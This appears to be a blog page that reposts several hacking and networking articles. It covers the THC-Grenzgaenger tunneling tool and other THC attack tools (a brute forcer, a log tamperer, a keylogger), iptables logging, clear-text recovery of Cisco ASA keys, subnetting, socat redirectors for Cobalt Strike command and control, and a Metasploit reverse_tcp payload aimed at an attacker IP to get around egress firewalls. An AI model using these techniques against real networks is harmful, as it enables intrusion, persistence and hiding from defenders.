BLACK MASK

Sunday, May 28, 2017

THC-Grenzgaenger 0.3 - Grenzgaenger is a Socks like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks. THC-Grenzgaenger tool is in ALPHA state! Please dont use it for anything illegal

Grenzgaenger is a Socks like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks. THC-Grenzgaenger tool is in ALPHA state! Please dont use it for anything illegal. Just play around with it, and it would be nice if you would give me feedback. Image the following: You are here this is a firewall this is a DMZ server where | allowing only port 443 you able to put a tool on | | | v v v *** *** *** ***-------------------------***------------------+-------*** *** *** | *** | +-> +-------*** | | many more DMZ server --+-> +-------*** | | +-> +-------*** and you would like to reconnaissance on that DMZ as you have been able to get at least one server there. Interactive login maybe a no-go, as it might be a Win95 machine, chrooted environment on linux, or some weird old HP-UX 9.0 machine were all the cool tools dont compile. This is were Grenzgaenger comes into play. It allows you to use many tools on your local console, as if you *would*be* having your laptop hooked up to the DMZ. I currently just verified that the stuff is working on my SuSE Linux 8.1. Your experience may vary. How to use it: Run the first tunnel proxy server on your own machine: ./ggd Do the same on the target machine. Use the -p option to choose a different listening port than 443. Edit the gg shell script and change the GG_TUNNEL="127.0.0.1:444:test" value to point to the target machine. e.g. GG_TUNNEL="192.168.13.3:443:test" In the session where you want to use the proxy, just do: gg command options e.g. gg netcat 192.168.13.3 23.

Latest software from The Hackers Choice

THC-pptp-bruter 0.1.4 - THC-pptp-bruter is a brute force program against pptp vpn endpoints (tcp port 1723). Tested against Windows and Cisco gateways. Exploits a weakness in Microsofts anti-brute force implementation which makes it possible to try 300 passwords the second.
THC-ManipulateData 1.3 - THC-ManipulateData can search data on a harddisk/partition/file, extract the part you are interested in, and write it back after you modified it. Useful to find and modify really all unencrypted Logfiles on a system.
THC-Flood Connect 1.5 - THC-Flood Connect is a connection flooding tool which supports SSL, dumping + sending data, closing or keeping sessions etc. Just a small release. Have fun. Use allowed only for legal purposes.
THC-Rut 1.2.5 - THC-Rut is your first knife on foreign network. It gathers informations from local and remote networks.
THC-RWWWShell 2.0 - THC-RWWWShell is proof-of-concept Perl program for the paper "Placing Backdoors through Firewalls". It allows communicating with a shell through firewalls and proxy servers by imitating webtraffic.

THC-Grenzgaenger Related Downloads

Thc , Dmz , Grenzgaenger 0 3 , THCGrenzgaenger , Hacker Tool , Tool , Gg , Netcat , Exploits , Transparently , Tunneling , THC-Grenzgaenger 0 3 , Security , Miscellaneous

THC-Shagg 0.2.0 - THC-Shagg is a modular application to bruteforce check digit algorithms. THC-Shagg project can be used to gain information about serial numbers that use check digit algorithms.
THC-FuzzyFingerprint 0.0.8 - Welcome to the world of Fuzzy Fingerprinting, a new technique to attack cryptographic key authentication protocols that rely on human verification of key fingerprints.
THC-SecureDelete 3.1 - THC-SecureDelete is the best secure data deletion toolkit! If you overwrite a file for 10+ times, it can still be recovered. Read why and use the programs included (w/src!). These tools can wipe files, free disk space, swap and memory!
THC-Yaotp 0.1 - THC-Yaotp (Yet Another One-Time Pad) is a tool that implements so called one-time pads and that is useful only to the totally paranoid geek..
THC-Amap 5.2 - THC-Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.
THC-vlogger 2.1.1 - THC-vlogger is an advanced linux kernel based keylogger, enables the capability to log keystrokes of all administrator/users sessions via console, serial and remote sessions (telnet, ssh), switching logging mode by using magic password, stealthily se
THC-Probe 4.1 - THC-Probe is the ultimate host scanner compilation for Linux, featuring nmap, snmpscan, netbios auditing tool and super-cool vh shell script. INSTALL: just run "make install".
THC-Shagg 0.2.0 - THC-Shagg is a modular application to bruteforce check digit algorithms. THC-Shagg project can be used to gain information about serial numbers that use check digit algorithms.
THC-FuzzyFingerprint 0.0.8 - Welcome to the world of Fuzzy Fingerprinting, a new technique to attack cryptographic key authentication protocols that rely on human verification of key fingerprints.
DOWNLOAD : http://www.downloadcollection.com/thc-grenzgaenger.htm

How to Log Linux IPTables Firewall Dropped Packets to a Log File

Log All Dropped Input Packets

First we need to understand how to log all the dropped input packets of iptables to syslog.

If you already have whole bunch of iptables firewall rules, add these at the bottom, which will log all the dropped input packets (incoming) to the /var/log/messages

iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP

In the above example, it does the following:

iptables -N LOGGING: Create a new chain called LOGGING
iptables -A INPUT -j LOGGING: All the remaining incoming packets will jump to the LOGGING chain
line#3: Log the incoming packets to syslog (/var/log/messages). This line is explained below in detail.
iptables -A LOGGING -j DROP: Finally, drop all the packets that came to the LOGGING chain. i.e now it really drops the incoming packets.

In the line#3 above, it has the following options for logging the dropped packets:

-m limit: This uses the limit matching module. Using this you can limit the logging using –limit option.
–limit 2/min: This indicates the maximum average matching rate for logging. In this example, for the similar packets it will limit logging to 2 per minute. You can also specify 2/second, 2/minute, 2/hour, 2/day. This is helpful when you don’t want to clutter your log messages with repeated messages of the same dropped packets.
-j LOG: This indicates that the target for this packet is LOG. i.e write to the log file.
–log-prefix “IPTables-Dropped: ” You can specify any log prefix, which will be appended to the log messages that will be written to the /var/log/messages file
–log-level 4 This is the standard syslog levels. 4 is warning. You can use number from the range 0 through 7. 0 is emergency and 7 is debug.

Log All Dropped Outgoing Packets

This is same as above, but the 2nd line below has OUTPUT instead of INPUT.

iptables -N LOGGING
iptables -A OUTPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP

Log All Dropped Packets (both Incoming and Outgoing)

This is same as before, but we’ll be taking the line number 2 from the previous two examples, and adding it here. i.e We’ll have a separate line for INPUT and OUTPUT which will jump to LOGGING chain.

To log both the incoming and outgoing dropped packets, add the following lines at the bottom of your existing iptables firewall rules.

iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A OUTPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP

Also, as we explained earlier, by default, the iptables will use /var/log/messages to log all the message. If you want to change this to your own custom log file add the following line to /etc/syslog.conf

kern.warning   /var/log/custom.log

How to read the IPTables Log

The following is a sample of the lines that was logged in the /var/log/messages when an incoming and outgoing packets was dropped.

Aug  4 13:22:40 centos kernel: IPTables-Dropped: IN= OUT=em1 SRC=192.168.1.23 DST=192.168.1.20 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=59228 SEQ=2
Aug  4 13:23:00 centos kernel: IPTables-Dropped: IN=em1 OUT= MAC=a2:be:d2:ab:11:af:e2:f2:00:00 SRC=192.168.2.115 DST=192.168.1.23 LEN=52 TOS=0x00 PREC=0x00 TTL=127 ID=9434 DF PROTO=TCP SPT=58428 DPT=443 WINDOW=8192 RES=0x00 SYN URGP=0

In the above output:

IPTables-Dropped: This is the prefix that we used in our logging by specifying –log-prefix option
IN=em1 This indicates the interface that was used for this incoming packets. This will be empty for outgoing packets
OUT=em1 This indicates the interface that was used for outgoing packets. This will be empty for incoming packets.
SRC= The source ip-address from where the packet originated
DST= The destination ip-address where the packets was sent to
LEN= Length of the packet
PROTO= Indicates the protocol (as you see above, the 1st line is for outgoing ICMP protocol, the 2nd line is for incoming TCP protocol)
SPT= Indicates the source port
DPT= Indicates the destination port. In the 2nd line above, the destination port is 443. This indicates that the incoming HTTPS packets was dropped

http://www.thegeekstuff.com/2012/08/iptables-log-packets/?utm_source=feedburner

Retrieving Encrypted Pre-Shared Keys from a Cisco ASA Configuration

Have you ever forgotten to document the ASA pre-shared keys for a VPN or VPN client connection? Do you need to see the unencrypted password? Try a show run on your Cisco ASA and you will likely find that all of your IKE pre-shared keys show up as *****. Fortunately, for me anyway, the one who tends to be slack on documenting, there is a method to retrieve those keys.

The command:

more system:running-config

See the difference in the results of “show run” and “more system:running-config”. Note that I filtered the output to only include the items of interest here.

ciscoasa# sh run | inc shared

ikev1 pre-shared-key *****

ciscoasa# more system:running-config | inc shared

ikev1 pre-shared-key 1!&rGU2Ptu

ikev1 pre-shared-key con!@#@Dmin

https://www.aubrett.com/article/information-technology/networking/routing-and-switching/cisco-firewalls/asa-encrypted-keys

Saturday, May 27, 2017

Subnetting: The ANDing Process

Introduction

As you would learn in basic TCP/IP, when a host connects to another
host, it has to determine whether or the connection is local or remote
(on the same subnet or on a different subnet). When connections are
local, the two hosts usually directly connect to one another to
communicate. When they are not, however, they have to connect to a
router, which forwards the packets along a path that eventually reaches
the packets' final destination: the remote host.

Well, in order to do this (that is, determining whether or not the
connection is local or remote), the host will execute a simple
mathematical function called an AND function. Even though this all
takes place automatically, it's important to understand it to in turn
understand how IP-based systems know whether to send packets to a host
or a router.

The Operation Itself

The AND function (or operation) is pretty simple...two binary digits are
compared, and based on their combination, a result is produced. It's
not addition, multiplication, subtraction, division, etc... I mean,
there are only 3 outcomes possible when ANDing two binary digits.

CODE :

0 AND 0 = 0 0 AND 1 = 0 1 AND 1 = 1

Basically unless the two digits are both 1, the result is 0.

But...how is this used in determining whether or not a host is local or
remote, you ask? I'm getting to that.

Using the ANDing Process to Determine the Location of a Host

It's really not too complicated. Basically, the host takes its own IP
address and ANDs it with its own subnet mask. Next, it takes the
destination IP and ANDs it with its own subnet mask. Then, it compares
these two numbers. If both results of the ANDing are identical, then
the hosts reside on the same subnet, and it is a local connection. If
they aren't, the destination host is remote, and they don't reside on
the same subnet.

Pretty simple, huh? Well, just to be sure you got the hang of it, let's
go over an example.

Host 1's IP is 192.168.1.3 (a class C IP address, if you remember my
previous articles) , with a subnet mask of 255.255.255.0
Host 2's IP is 192.168.1.7, which is also class C, and has a subnet mask
of 255.255.255.0.

Well, to find out if the connection is local or remote, Host 1 starts
the ANDing process.

CODE :

Host 1's IP in binary (you should remember how to do this from my previous article): 11000000 10101000 00000001 00000011 Host 2's IP in binary: 11000000 10101000 00000001 00000111 Subnet mask in binary: 11111111 11111111 11111111 00000000 ANDing process for Host 1: 11000000 10101000 00000001 00000011 AND 11111111 11111111 11111111 00000000 = 11000000 10101000 00000001 00000000 (result) ANDing process for Host 2: 11000000 10101000 00000001 00000111 AND 11111111 11111111 11111111 00000000 = 11000000 10101000 00000001 00000000 (result) Comparing the results against one another: Host 1: 11000000 10101000 00000001 00000000 Host 2: 11000000 10101000 00000001 00000000

As you can see, they're the same, meaning they're on the same subnet, and are
locally connected to one another.

Now, there are two different ways to write an IP address using subnet masks.
For one, you have a host's class A/B IP and subnet mask; for two, you have its
class C IP and subnet mask (but shown in bits). For example, 49.22.2.3
255.0.0.0 (class A IP and subnet mask), or 192.168.1.3/24 (class C IP and
subnet mask shown in bits (255 in binary is 11111111 or 8 bits...1111111*3=24
in base 10)).

More on Subnets

Often times it is fairly useful to divide a network into smaller networks.
Reasons for this are outlined in my previous article, but to recap: to prevent
the wasting of IPs, to make it difficult to map the internal structure of a
network, etc. Well, here's how it's done.

Let's say we want to divide a class B IP into 8 subnets. As you should know at
this point, the class B subnet mask is 255.255.0.0. Well, to do this, we need
to use something called the borrowing process (maybe covered in a later
article) to create the 8 subnets. Since we need 8, we need 8 different
combinations + 1 more (the broadcast (also maybe covered later)), so 9 in
total.

The binary equivalent of 9 is 1001, which is 4 bits long.

CODE :

Subnet mask: 11111111 11111111 00000000 00000000 Putting 4 bits into the third group (or the first octet of the host part of the IP (read earlier articles!!!)): 11111111 11111111 11110000 00000000 (240 in base 10)

So our new subnet mask would be...? You might have guessed it, 255.255.240.0.

A simple calculation to determine the number of subnets is 2^x-2 (as stated in
a previous article, once again! :P), where x is the bits number for the subnet
mask (or 4 in the above example).

The calculation for subnets addresses (finally, something new, eh?) is 256-s,
where s is the value of the subnet mask; above, this value was 240.

The calculation for the hosts number is 2^y-2, where y is the number of
remaining bits. In our example, this was 12, because:

CODE :

----------------------bits left (12) 11111111 11111111 11110000 00000000 ----------------- bits ----------------inserted ------------------(4)

The IP address numbers are between the IP of the first subnet and the IP of the
last subnet witht he exclusion of the broadcast and network IPs. Broadcast IPs
have all the bits of the host portion set to one (255s), and network IPs have
all the bits of the host portion set to 0 (0s).

Let's sum this up with one last example.

Let's divide a class C IP address into two subnets. We'll use 192.168.1.3
again. As you already know, you need 2 subnets +1 for broadcasting, so 3
total. In binary, 3 is 11, or two bits. The class C subnet mask (as you
should know by now) is 255.255.255.0. After the borrowing process, its last
group becomes 11000000, or 192 in base 10. So the new subnet mask is
255.255.255.192.

Number of hosts: 2^6-2=62 (y is 6 in this case)
Subnet addresses: 256-192=64 (s is 192)...so it starts with 192.168.1.67 then
goes to 192.168.1.131...it starts with 64 and keeps adding 64.

That's about all I can cover in the scope of this particular article. As
always, look out for articles from me in the future.

https://www.hackthissite.org/articles/read/902

Cloud-based Redirectors for Distributed Hacking

January 14, 2014

A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and setup several systems to act as redirectors (pivot points) back to their command and control server.

As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.
Here’s the socat command to forward connections to port 80 to 54.197.3.16:

socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80

The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directives tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.
Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.
Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:

You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:

The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.

Now, one Cobalt Strike instance, has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convienence of managing all of this on one team server though.
If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic - See more at: http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/#sthash.XJktb45G.dpuf

Level : Medium, Advanced

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this

) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Information(Attacker) :

– Attacker1 use local IP address –> 192.168.8.8

– Attacker1 have public IP address –> 73.67.123.85

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

– Victim1 have local IP address –> 192.168.1.2

– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443

When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise

Hope you found it useful.

If information I wrote here was wrong, let me know I'll correct it

Get the latest hacking tutorial by subscribe to this website :

Subscribe Hacking Tutorial

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/#sthash.XJktb45G.dpuf